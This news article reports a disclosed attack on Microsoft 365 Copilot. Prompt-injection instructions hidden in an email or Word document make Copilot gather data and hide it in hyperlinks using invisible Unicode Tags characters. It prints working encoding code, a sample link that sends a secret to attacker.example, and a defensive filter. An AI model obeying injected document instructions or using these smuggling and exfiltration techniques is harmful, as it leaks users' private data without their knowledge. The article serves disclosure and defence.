New Attack on Microsoft 365 Copilot Steals Personal Data
A cybersecurity researcher has uncovered a critical vulnerability in Copilot, the AI-powered assistant integrated into Microsoft 365, that enables malicious actors to exfiltrate sensitive data.
The exploit chain, which was reported to the Microsoft Security Response Center (MSRC) before public disclosure, combines several sophisticated techniques and poses significant risks to data security and privacy. The findings were published by the Embrace The Red research team.
The exploit is a multi-stage attack. It begins when a victim receives a malicious email or document containing concealed instructions. When Copilot processes these instructions, it automatically acts on them, searching for additional emails and documents and escalating the attack without any user intervention.
The key element of this exploit is a technique known as ASCII Smuggling. The method uses special Unicode characters that most interfaces do not render, making the encoded data invisible to the user. Attackers can embed sensitive information in hyperlinks; when a user clicks such a link, the hidden data is transmitted to servers under the attackers' control.
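To make the technique concrete, here is a minimal sketch of the kind of encoding ASCII Smuggling relies on. It assumes the commonly described variant that maps each ASCII character onto the corresponding code point in the invisible Unicode Tags block (U+E0000 onward); this is an illustration, not the researcher's exact proof of concept.

```python
# Sketch of ASCII Smuggling: hide ASCII text in invisible Unicode Tags
# characters (U+E0000 block). Most renderers display these as nothing.
TAG_BASE = 0xE0000

def smuggle(text: str) -> str:
    """Encode printable ASCII as invisible Unicode Tags characters."""
    return "".join(chr(TAG_BASE + ord(c)) for c in text if ord(c) < 0x80)

def unsmuggle(hidden: str) -> str:
    """Recover the original ASCII from Tags-block characters."""
    return "".join(
        chr(ord(c) - TAG_BASE)
        for c in hidden
        if TAG_BASE <= ord(c) <= TAG_BASE + 0x7F
    )

secret = smuggle("one-time code: 123456")
print(len(secret))        # same number of code points as the plaintext
print(unsmuggle(secret))  # round-trips back to "one-time code: 123456"
```

Because the encoded string survives copy-and-paste and string concatenation while rendering as empty, it can ride along inside otherwise innocent-looking text.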
The research demonstrated a scenario in which a Word document containing specially crafted instructions deceived Microsoft Copilot into performing attacker-chosen actions. The document relied on prompt injection: commands embedded in the text that Copilot interpreted as legitimate user requests.
As Copilot processed the document, it began executing the embedded instructions as if they were ordinary user commands. As a result, the tool automatically initiated actions that could leak sensitive information or enable other fraud, without any warning to the user.
The final stage of the attack is data exfiltration. By controlling Copilot and accessing additional data, attackers embed hidden information within hyperlinks, which are then transmitted to external servers when clicked by users.
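The exfiltration step described above can be sketched as follows. The domain `attacker.example`, the secret value, and the link text are all hypothetical; the sketch only illustrates how invisible Tags-block characters let a link carry hidden data while its visible text looks benign.

```python
# Illustrative only: how smuggled data could ride inside a hyperlink.
# "attacker.example" and the secret are made-up placeholder values.
TAG_BASE = 0xE0000

def smuggle(text: str) -> str:
    """Encode printable ASCII as invisible Unicode Tags characters."""
    return "".join(chr(TAG_BASE + ord(c)) for c in text if ord(c) < 0x80)

secret = "Q3-report-draft"                      # data Copilot was tricked into gathering
link_text = "Click for details" + smuggle(secret)  # invisible payload in the anchor text
url = "https://attacker.example/c?d=" + secret     # clicking sends the data out

markdown_link = f"[{link_text}]({url})"
print(markdown_link)  # renders as a harmless-looking "Click for details" link
```

To the user the rendered link reads as plain "Click for details"; the hidden characters and the query string do the actual exfiltration when the link is followed.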
To mitigate the risk, the researcher recommended several measures to Microsoft, including no longer interpreting Unicode Tags characters and no longer rendering clickable hyperlinks. Although Microsoft has implemented some fixes, the details of those measures remain undisclosed, which raises transparency concerns.
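On the defensive side, one of the recommended measures, refusing to interpret Unicode Tags characters, amounts to filtering them out of any text before it reaches the model or the renderer. A minimal sketch (function names are illustrative, not part of any Microsoft API):

```python
import re

# Detect and strip the Unicode Tags block (U+E0000-U+E007F), the range
# ASCII Smuggling hides its payload in. Names here are illustrative.
TAG_RE = re.compile(r"[\U000E0000-\U000E007F]")

def contains_smuggled_data(text: str) -> bool:
    """Flag text that carries invisible Tags-block characters."""
    return bool(TAG_RE.search(text))

def strip_tag_characters(text: str) -> str:
    """Remove all Tags-block characters, leaving the visible text."""
    return TAG_RE.sub("", text)
```

Running untrusted input (email bodies, attached documents, retrieved files) through such a filter neutralizes this particular smuggling channel, though it does not address prompt injection itself.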
The company’s response to the identified vulnerability has been partially successful: some exploits are no longer functional. However, the lack of detailed information about the applied fixes leaves questions about the complete security of the tool.
This case underscores the complexity of securing AI-driven tools and the need for continued collaboration and transparency to protect against future threats.